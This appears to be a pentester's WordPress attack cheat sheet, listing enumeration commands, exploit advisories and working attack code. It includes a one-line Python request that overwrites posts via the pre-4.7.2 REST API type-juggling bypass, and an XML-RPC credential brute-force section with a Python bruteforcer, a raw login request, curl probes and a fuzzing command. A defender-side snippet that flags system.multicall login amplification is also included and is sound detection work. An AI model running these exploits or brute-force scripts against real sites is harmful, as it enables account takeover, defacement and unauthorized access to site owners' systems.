# wordpress
# scanners
wpscan --url blah.com -e u,vt,vp (based on https://wpvulndb.com/)
# fingerprint
GET /readme.html
plecost (pkgdesc from its PKGBUILD): "Wordpress fingerprinting tool; searches and retrieves information about the plugin versions installed in Wordpress systems."
# exploit framework
http://pentestit.com/wpxf-wordpress-exploit-framework/
# username enumeration
?author=1
# releases
https://wordpress.org/news/category/releases/
# unauth modification of blog posts < 4.7.2 due to type juggling
https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
authorization checks can be bypassed by including an "id" parameter value in either the query string or the POST payload that contains any non-numeric character
import requests
requests.post('http://blah.com/index.php/wp-json/wp/v2/posts/1', json={"id":"1aha","title":"owned","content":"haha"})
# xss in comments to rce (affected: 4.2, 4.1.2, 3.9.3 ...)
http://klikki.fi/adv/wordpress2.html
# rce
http://vagosec.org/2013/12/wordpress-rce-exploit/
# sqli + rce
http://blog.checkpoint.com/2015/08/11/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-ii-supremacy/
# cookie integrity fail CVE-2008-1930 <=2.5
https://pentesterlab.com/exercises/cve-2008-1930/course
# auth cookie forgery wordpress <3.7.2 & <3.8.2
http://www.securitysift.com/understanding-wordpress-auth-cookies/
https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/
# bf login creds via /xmlrpc.php when wp-login.php is filtered
# with wp < 4.4.1 you can send 500 login/password pairs in one request (system.multicall) to bypass rate limiting
https://github.com/zendoctor/wpbrute-rpc
https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html -> msf/auxiliary/scanner/http/wordpress_multicall_creds
http://www.hsc-news.com/archives/2014/000123.html
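Added defender-side example, not from the notes above: parse an XML-RPC POST body and count how many credential-taking calls one system.multicall bundles, which is the signal a WAF rule or access-log filter would key on before deciding to drop the request or to strip system.multicall via the xmlrpc_methods filter. The method set in AUTH_METHODS and both sample bodies are constructed for the example.

```python
import xml.etree.ElementTree as ET

# XML-RPC methods that take a username/password pair; bundled into a
# system.multicall they turn one POST into hundreds of login guesses.
AUTH_METHODS = {"wp.getUsersBlogs", "blogger.getUserInfo", "wp.getCategories"}

def _method_name_of(call_struct):
    """Return the methodName member of one multicall <struct>, or None."""
    for member in call_struct.findall("member"):
        if member.findtext("name") == "methodName":
            return member.findtext("value/string")
    return None

def inspect_xmlrpc(body):
    """Summarise one POST body as (top-level method, inner calls, auth calls).

    A plain call counts as one call; for system.multicall every <struct> in
    the first param's array is counted and classified by its methodName.
    """
    root = ET.fromstring(body)
    method = root.findtext("methodName")
    if method != "system.multicall":
        return method, 1, int(method in AUTH_METHODS)
    structs = root.findall("params/param/value/array/data/value/struct")
    inner = [_method_name_of(s) for s in structs]
    return method, len(inner), sum(1 for m in inner if m in AUTH_METHODS)

def is_amplified_login(body, max_auth_calls=3):
    """True when a single request carries more login attempts than allowed."""
    _, _, auth_calls = inspect_xmlrpc(body)
    return auth_calls > max_auth_calls

# Constructed sample bodies (not captured traffic): one harmless discovery
# call, and one multicall carrying three blogger.getUserInfo guesses.
SINGLE_CALL = ('<?xml version="1.0"?><methodCall><methodName>system.listMethods'
               '</methodName><params></params></methodCall>')
_ENTRY = ('<value><struct><member><name>methodName</name><value><string>'
          'blogger.getUserInfo</string></value></member><member><name>params</name>'
          '<value><array><data><value><string></string></value><value><string>admin'
          '</string></value><value><string>%s</string></value></data></array></value>'
          '</member></struct></value>')
MULTICALL = ('<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
             '<params><param><value><array><data>' + _ENTRY % 'guess1' + _ENTRY % 'guess2'
             + _ENTRY % 'guess3' + '</data></array></value></param></params></methodCall>')

if __name__ == "__main__":
    for name, body in (("single", SINGLE_CALL), ("multicall", MULTICALL)):
        print(name, inspect_xmlrpc(body), "flagged:", is_amplified_login(body, 2))
```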
$ echo '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' > get_method.xml
List avail methods first (methods can be removed in the wp configuration)
$ curl -v -H "User-Agent: Mozilla/5.0" -X POST -d @get_method.xml --url "http://cible.com/xmlrpc.php"
NB: if this request returns an error code (403, 400, 501, etc.), besides the
usual tests with the "X-*" origin headers, try an exotic method such as:
$ curl -v -H "User-Agent: Mozilla/5.0" -X TOTO -d @get_method.xml --url "http://cible.com/xmlrpc.php"
import xmlrpclib  # Python 2; the same module is xmlrpc.client on Python 3

def bruteForce(url, listUser, listPassword):
    server = xmlrpclib.Server(url)  # url = http://cible.com/xmlrpc.php
    for user in listUser:
        for pwd in listPassword:
            # one array param (appkey, username, password); IXR unwraps it server-side,
            # which is why the captured request below carries a single <array> param
            param = ['', user, pwd]
            try:
                res = server.blogger.getUserInfo(param)
            except Exception:
                pass  # bad credentials come back as an xmlrpclib.Fault
            else:
                print " Win \o/ : " + user + " : " + pwd
or
POST /xmlrpc.php HTTP/1.1
Host: blah
Accept-Encoding: gzip
User-Agent: xmlrpclib.py/1.0.1 (by www.pythonware.com)
Content-Type: text/xml
Content-Length: 286
<?xml version='1.0'?><methodCall><methodName>blogger.getUserInfo</methodName><params><param><value><array><data><value><string></string></value><value><string>admin</string></value><value><string><![CDATA[FILE0]]></string></value></data></array></value></param></params></methodCall>
zombies (botnet hosts) seen doing this in the wild use wp.getCategories for the same purpose
http_fuzz url='/xmlrpc.php' header='Content-Type: text/xml' method=POST body=@body.xml auto_urlencode=0 -x ignore:fgrep='Incorrect username or password'